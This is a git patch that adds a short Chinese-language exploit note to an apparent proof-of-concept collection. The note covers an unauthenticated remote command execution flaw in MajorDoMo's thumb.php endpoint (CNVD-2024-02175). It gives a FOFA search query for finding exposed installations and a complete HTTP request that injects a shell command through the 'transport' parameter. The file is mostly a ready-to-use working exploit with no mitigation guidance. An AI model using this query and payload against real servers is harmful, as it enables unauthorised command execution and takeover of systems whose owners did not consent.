From 5e0875a7fefb65b23d202d4b96044c99723140bb Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 27 Apr 2024 19:48:07 +0800 Subject: [PATCH] =?UTF-8?q?Create=20MajorDoMo-thumb.php=E6=9C=AA=E6=8E=88?= =?UTF-8?q?=E6=9D=83RCE=E6=BC=8F=E6=B4=9E=E5=A4=8D=E7=8E=B0(CNVD-2024-0217?= =?UTF-8?q?5).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...b.php未授权RCE漏洞复现(CNVD-2024-02175).md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175).md diff --git a/MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175).md b/MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175).md new file mode 100644 index 0000000..8a1da76 --- /dev/null +++ b/MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175).md @@ -0,0 +1,19 @@ +## MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175) + +MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。 + +## fofa +``` +app="MajordomoSL" +``` + +## poc +``` +GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 +Accept-Charset: utf-8 +Accept-Encoding: gzip, deflate +Connection: close +``` +![image](https://github.com/wy876/POC/assets/139549762/89f477a7-2e73-4a27-863b-c3ba1fd701e6)